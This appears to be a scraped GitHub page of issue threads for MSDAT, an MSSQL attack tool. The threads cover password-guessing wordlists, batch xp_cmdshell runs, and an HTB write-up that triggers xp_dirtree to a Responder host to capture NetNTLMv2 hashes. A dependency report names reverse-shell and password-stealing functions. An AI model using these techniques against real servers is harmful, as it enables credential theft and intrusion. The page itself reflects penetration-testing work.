quentinhardy / msdat Goto Github PK
View Code? Open in Web Editor NEWMSDAT: Microsoft SQL Database Attacking Tool
MSDAT: Microsoft SQL Database Attacking Tool
what a format for wordlist accept by passwordguesser ?
in the example : sa/sa
what the meaning ? thank ..
My team uses msdat non-interactively against a ton of machines using GNU's parallel
command. It'd be nice if the xp_cmdshell
module supported running a specific user provided command such as whoami
rather than prompting for an interactive session/command. Both options WOULD be nice to have. Having this feature would allow us to more easily test plenty of MSSQL servers over running one at a time.
Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:
I used impacket-mssclient
and DBeaver to run exec xp_dirtree '\\#.#.#.#\share'
which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public
access only.
Looking at the verbose comments, my guess is that this particular box does not have a C:\
. I'll continue working and see if this box has a C:\
later on. What I find interesting is that the result was an empty list []
, not a SQL error. I am no expert at SQL, but could we modify the xpdirectory
module to check if []
was returned and not a SQL error?
My team uses msdat non-interactively against a ton of machines using GNU's parallel command. We like to check and see if xp_cmdshell can be executed. Currently xp_cmdshell allows the user to enable or disable the xp. However, I'd like to be able to restore the xp_cmdshell to how we found it so that I am not leaving xp_cmdshell enabled if was already disabled on client environments.
So the breakdown would be:
hi there, could you please help me with this
root@kali:/Downloads/mssql/msdat# ./msdat.py -h/Downloads/mssql/msdat# pip3 install pymssql
Traceback (most recent call last):
File "./msdat.py", line 10, in
from Mssql import Mssql
File "/root/Downloads/mssql/msdat/Mssql.py", line 6, in
import pymssql, _mssql, decimal
ImportError: No module named pymssql
root@kali:
Requirement already satisfied: pymssql in /usr/local/lib/python3.8/dist-packages (2.1.5)
I would like the tool to output results to file. Understanding this tool has many different modules, a standardized machine readable file type such as CSV may be difficult. However, having the tool output timestamps of actions and results would allow the tool to be run with persistent results. I see that something was started here, but was commented out:
#PPoutput.add_argument('--output-file',dest='outputFile',default=None,required=False,help='save results in this file')
I have been going through the MSSQL hacking tools in the community and noticed no mention of TLS in this repository. Does it support MSSQL TLS connections?
It would be cool if we added a flag such as -sL
to run the intended module(s) against multiple servers at once. I am already wrapping msdat in a Bash script. This would be a line delimited text file of servers rather than a nmap input file.
I see that multiple hosts are supported for password guessing:
PPpassguesser.add_argument('-l', dest='hostlist', required=False, help='filename which contains hosts (one ip on each line: "ip:port" or "ip" only)')
Hi, In msdat, inappropriate dependency versioning constraints can cause risks.
Below are the dependencies and version constraints that the project is using
cython
colorlog
termcolor
pymssql
argparse
python-libnmap
argcomplete
The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict.
The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.
After further analysis, in this project,
The version constraint of dependency cython can be changed to ==3.0.0a10.
The version constraint of dependency colorlog can be changed to >=0.1,<=0.4.
The version constraint of dependency colorlog can be changed to >=1.4,<=1.8.
The version constraint of dependency colorlog can be changed to >=6.3.0a1,<=6.6.0.
The version constraint of dependency argparse can be changed to >=1.2.1,<=1.4.0.
The version constraint of dependency argcomplete can be changed to >=0.1.7,<=0.7.1.
The above modification suggestions can reduce the dependency conflicts as much as possible,
and introduce the latest version as much as possible without calling Error in the projects.
The invocation of the current project includes all the following methods.
queue.Queue
colorlog.ColoredFormatter
argparse.ArgumentParser argparse.ArgumentParser.parse_args argparse.HelpFormatter argparse.ArgumentParser.add_subparsers
argcomplete.autocomplete
iw.r.update self.__saveThisLoginInFileIfNotExist__ self.args.close Xpcmdshell.testAll functools.reduce next LAST_RUN_OUTCOME.items self.readFile self.useThisDB map productVersion.append self.tryToCaptureASmbAuthentication search.searchInColumnNames.add_rows argparse.ArgumentParser.testAll self.nb.get self.header R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format marked_width.m.rjust socket.socket.connect MssqlInfo.__getRemoteVersionThroughSQLServerBrowser__ TrustworthyPE.testAll os.popen.read.split Jobs.getInteractiveReverseShell self.REQ_EXEC_SYS_CMD.format aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace.replace Search self.captureSMBAuthenticationViaXpDirtree accounts.append pymssql.connect self.fd.write join Passwordstealer self.getUsernamesViaSuserName getHostsFromFile.append self._splitit self.REQ_OPENROWSET_REMOTE_CONNECTION.format ScanPorts.scanAPort socket.inet_aton base64.b64encode re.findall bulkOpen.searchValideAccounts.append self.reset TrustworthyPE.TrustworthyPE.connect BulkOpen.readFileViaOpenRowSet self.REQ_READ_FILE.format BulkOpen.remoteConnectionWithOpenrowset self.__getUsernames__ Jobs.Jobs.testAll Utils.generateUniqueName math.ceil self.writeFileBinary _thread.exit OleAutomation.putFile bytes.fromhex os.walk usern.lower hasattr self.__getAnExampleOfValueForAColumn__ anAccount.startswith threading.Thread.start ports.split.append self.set_chars cells.append self.args.execute data.str.split self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format self.isFileExistViaXpFileexist XpDirectory.listFilesViaXpDirtree logging.getLogger.setLevel signal.signal self.execSP self.waitSomeSecs self._check_align XpDirectory.isFileExistViaXpFileexist datetime.datetime.now.strftime range self.REQ_GET_COLUMNS_IN_TABLES.format argparse.HelpFormatter SMBAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails self.update maxvalue.ETA.Bar.Percentage.ProgressBar.start queue.Queue repr UsernameLikePassword.tryUsernameLikePassword args.badNews os.path.join BulkOpen.closeConnection isinstance search.searchInColumnNames.draw self.getJobs self._compute_cols_width Search.searchInColumnNames PS_CMD_WRITE_CREATE.format re.compile.match usern.upper self.REQ_USE_THIS_DB.format marked_width.m.ljust Jobs.testAll XpDirectory.closeConnection self.__getRemoteVersionThroughTDSResponse__ ScanPorts.scanAPort.start currentFile.lower.endswith threading.Thread.__init__ argparse.ArgumentParser.parse_args re.compile.sub.extend dict.badNews Jobs.createAndExecuteJob Utils.getStandardBarStarted e.replace argparse.ArgumentParser self._has_border logging.StreamHandler Search.closeConnection NC_CMD.format self.marker.update OleAutomation.OleAutomation OleAutomation.getFile self.stealHashedPasswords self._format_marker BulkOpen.readFileViaBulkinsert strg.replace.replace logging.StreamHandler.setFormatter type self.getCompleteVersion os.popen resultsToTable.append ArraySizeError self._hline XpDirectory.testAll anAccountIsGiven fcntl.ioctl getScreenSize parser.parse_args.func oleAutomation.putFile.encode sorted search.searchInColumnNames.count runBulkInsertForGet self.listDrivesViaXpAvailableMedia datetime.datetime.now runBulkInsertForRead checkOptionsGivenByTheUser BulkOpen Utils.getPSReverseShellCodeEncoded Passwordstealer.printPasswords self.listDirectoriesViaXpSubdirs self._build_hline logging.info Xpcmdshell.uploadFileWithPowershell BulkOpen.searchValideAccounts aRawData.base64.b64encode.decode XpDirectory.createSubDiViaXpCreateSubdir PasswordGuesser.searchValideAccounts self.REQ_EXEC_SP_FOR_PE.format max ValueError self.deleteSP self._rows.append self.__createJob__ self.readFileViaOpenRowSet socket.socket.sendall configureLogging self.REQ_EXEC_JOB.format OleAutomation.readFile threading.Thread UsernameLikePassword argparse.ArgumentParser.add_subparsers strg.replace self.createAndExecuteJob self._has_vlines.join self.remoteConnectionWithOpenrowset main R_SHELL_COMMAND_POWERSHELL.format MssqlInfo.returnPrintableStringFromDict Percentage ansi_keep.pop self.__setJob__ self._has_hlines parser.add_subparsers.add_parser self._format_line self.handle_resize self.executeRequest self.allUsernames.append Search.isEmptyTable re.compile.sub Passwordstealer.stealHashedPasswords self.__getJobStatusValue__ cleanString pbar.percentage time.time format Jobs.getJobStatus argcomplete.autocomplete BulkOpen.scanPortsWithOpenrowset Jobs.printJobs self._has_header selectData.append self.executeCmd socket.socket self.args.fetchall Xpcmdshell.Xpcmdshell.testAll struct.pack self.tryPE results.insert self._len_cell Utils.getScreenSize range.append Xpcmdshell.enableXpcmdshell self.REQ_DROP_TABLE.format texttable.Texttable.add_rows getHostsFromFile self.REQ_WRITE_FILE.format OleAutomation.connect enumerate BulkOpen.getFileViaOpenRowSet self.queueLock.acquire self._check_row_size OleAutomation.getInteractiveReverseShell TrustworthyPE.TrustworthyPE os.remove self.OUTPUT_FORMAT_XP_DIRTREE.format aHost.cleanString.split self.VERSIONS.items Passwordstealer.testAll dict.bigTitle self.__getAccounts__ self.nb.get.put BulkOpen.disableAdHocDistributedQueries self.getStandardBarStarted anAccount.hex print self.args.title Passwordstealer.closeConnection self.__dropSysadminPriv__ self.captureSMBAuthenticationViaXpFileexist texttable.Texttable.set_deco self.isThe2005Version pbar.update SMBAuthenticationCapture.SMBAuthenticationCapture strg.replace.replace.replace re.compile Xpcmdshell.closeConnection socket.gethostbyname utf16LEPayloadBytes.base64.b64encode.decode MssqlInfo list self.getJobStatus termcolor.colored array.array subparsers.add_parser.set_defaults Mssql.Mssql R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format.encode sys.exit self.portStatusQueue.put libnmap.parser.NmapParser.parse_fromfile iter runAllModules self.output.printOSCmdOutput PS_CMD_WRITE_APPEND.format Mssql.Mssql.connect Jobs self.REQ_GET_COLUMNS_IN_VIEWS.format values.append self.REQ_XPCMDSHELL_CMD.format open.write self.__askToTheUserIfNeedToContinue__ UsernameLikePassword.runUsernameLikePassword zip line_wrapped.append passwords.append self.REQ_BULK_INSERT.format anOperationHasBeenChosen XpDirectory runPasswordGuesserModuleOnAHost Xpcmdshell.connect str Utils.ipOrNameServerHasBeenGiven aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace open connectionInformation.keys os.path.dirname XpDirectory.connect sys.stderr.write Passwordstealer.Passwordstealer.testAll TrustworthyPE.cleanPE self.accounts.append Exception.__init__ float self.disableXpcmdshell Jobs.Jobs w.update OleAutomation Utils.databaseHasBeenGiven OleAutomation.OleAutomation.testAll Xpcmdshell.getInteractiveShell texttable.Texttable self.REQ_WRITE_FILE_BINARY.format self.getRemoteDatabaseVersion len Utils.cleanString Passwordstealer.Passwordstealer self._str dict anAccount.endswith self.REQ_XP_FILEEXIST.format self.__dropTable__ args.title Xpcmdshell.disableXpcmdshell self.enableAdHocDistributedQueries logging.getLogger logging.critical SMBAuthenticationCapture.captureSMBAuthenticationViaXpDirtree SMBAuthenticationCapture.testAll self.readFileViaBulkinsert itertools.zip_longest self.REQ_DROP_PRIV.format OleAutomation.writeFile portsQueue.join int SMBAuthenticationCapture.tryToCaptureASmbAuthentication optik.textwrap.wrap databases.append currentFile.lower Search.connect args.goodNews validAccountsList.items r.append Xpcmdshell.Xpcmdshell time.strftime ProgressBar self.queueLock.release self.__getRemoteVersionThroughSQLServerBrowser__ self.OUTPUT_MEDIA.format self.isThe2012Version open.read self.REQ_STEP_JOB.format input self.disableAdHocDistributedQueries PasswordGuesser.PasswordGuesser.searchValideAccounts self.__searchPatternInColumnNamesOfViews__ SMBAuthenticationCapture SMBAuthenticationCapture.SMBAuthenticationCapture.testAll self.portsQueue.empty input.lower self.__searchPatternInColumnNamesOfTables__ OleAutomation.disableOLEAutomationProcedures XpDirectory.XpDirectory validAccounts.append self.nb.put socket.socket.recv self.__createStoredProcToPE__ self.isCurrentUserSysadmin self.format_time self.__getPasswords__ TrustworthyPE.TrustworthyPE.testAll argparse.ArgumentParser.add_argument self.captureSMBAuthenticationViaXpGetFileDetails self.createSubDiViaXpCreateSubdir search.searchInColumnNames.set_deco self._format_widgets XpDirectory.listDrivesViaXpAvailableMedia self.REQ_XP_CREATE_SUBDIR.format self.__addJob__ OleAutomation.closeConnection self.getCurrentUser self.__isFileNotExist__ time.sleep socket.socket.settimeout OleAutomation.testAll self.pbar.update self.isThe2008Version self.scannerObject.remoteConnectionWithOpenrowset ScanPorts.ScanPorts.printScanPortResults self.__execJob__ Utils.getBinaryDataFromFile args.subtitle BulkOpen.BulkOpen.testAll self.REQ_CREATE_TABLE.format runBulkInsertForGet.encode socket.socket.sendto ports.split self.executeSysCmd re.compile.sub.split self.REQ_ADD_JOB.format l.replace.replace.replace self.__loadCompleteVersionIfNeed__ status.str.replace BulkOpen.testAll Xpcmdshell args.unknownNews portsQueue.put l.cleanString.split mssqlRawData.rfind self._splitit.split TrustworthyPE.isCurrentUserSysadmin Utils.putDataToFile self.__delJob__ hfill_inds.append aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace SMBAuthenticationCapture.captureSMBAuthenticationViaXpFileexist self.REQ_GET_VALUE_IN_COLUMN.format self.percentage OleAutomation.executeSysCmd PasswordGuesser.getHostsFromFile self.__loadAllUsernames__ Output.Output self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format self.REQ_CREATE_JOB.format self.add_row open.readlines self._hline_header self.__getTrustworthyDBs__ aService.service.lower Passwordstealer.connect self.enableXpcmdshell open.close XpDirectory.listDrivesViaXpFixedDrives ScanPorts.ScanPorts.scanTcpPorts self._draw_line BulkOpen.BulkOpen.closeConnection threading.Lock BulkOpen.enableAdHocDistributedQueries self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format self._format_widgets.join.ljust self.args.cursor self.REQ_XP_SUBDIRS.format Bar Utils.checkOptionsGivenByTheUser logging.Formatter self.args.unknownNews OleAutomation.enableOLEAutomationProcedures time.gmtime validUsers.append SMBAuthenticationCapture.connect Utils.getCredentialsFormated Jobs.connect ScanPorts.ScanPorts self.OUTPUT_DRIVES.format self.__createTable__ self._need_update struct.unpack self.__getJobStatus__ database.connectionInformation.append BulkOpen.BulkOpen self.writeFile UsernameLikePassword.connect os.path.isfile os.path.isdir ansi_keep.append self.REQ_XP_DIRTREE.format dict.title self.REQ_STORED_PROC_TO_SYSADMIN.format dict.goodNews logging.debug self.args.badNews MssqlInfo.__getRemoteVersionThroughTDSResponse__ os.path.abspath self.isThe2000Version self.REQ_GET_STATUS.format dict.items self.REQ_OPENROWSET.format ipOrNameServerHasBeenGiven XpDirectory.listDirectoriesViaXpSubdirs BulkOpen.connect certificateBasedSQLServerLogins.append l.replace.replace pbar.finish self.REQ_READ_LINES.format self.cleanPE TrustworthyPE.tryPE ports.isdigit os.mkdir self.isThe2014Version self._has_vlines self.enableOLEAutomationProcedures Utils.cleanString.replace runOpenRowSetForGet self.listDrivesViaXpFixedDrives Utils.ErrorClass self.REQ_IS_A_VALID_USERNAME.format logging.getLogger.addHandler TrustworthyPE.connect TrustworthyPE input.replace ETA parser.parse_args._get_kwargs self.REQ_DEL_PROC.format f.read.encode self.REQ_DEL_JOB.format random.randrange list.extend self.args.autocommit cleanList.append self.args.goodNews aDictionary.items aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace.replace logging.warning self.listFilesViaXpDirtree self.args.subtitle self.portsQueue.get self.__getProductNameFromVersion__ BulkOpen.getFileViaBulkinsert PasswordGuesser self.REQ_GET_USERNAME.format x.encode askToContinue colorlog.ColoredFormatter SMBAuthenticationCapture.closeConnection logging.error iterable.__len__ Mssql.Mssql.__init__ runOpenRowSetForRead PasswordGuesser.PasswordGuesser self.portsQueue.task_done os.popen.read Mssql.Mssql.closeConnection Passwordstealer.credentialsAreEmpty texttable.Texttable.draw usernames.append subprocess.call
@developer
Could please help me check this issue?
May I pull a request to fix it?
Thank you very much.
The documentation fails to mention that you need to do sudo pip install pyodbc
Add a requirements.txt file for easy Python module dependency clarification
Hello, my employer would like to use your code as a part of our penetration tests. Not to distribute, but use. Could you add an appropriate license to allow this OR at least provide a license to clarify your software usage? Thanks!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.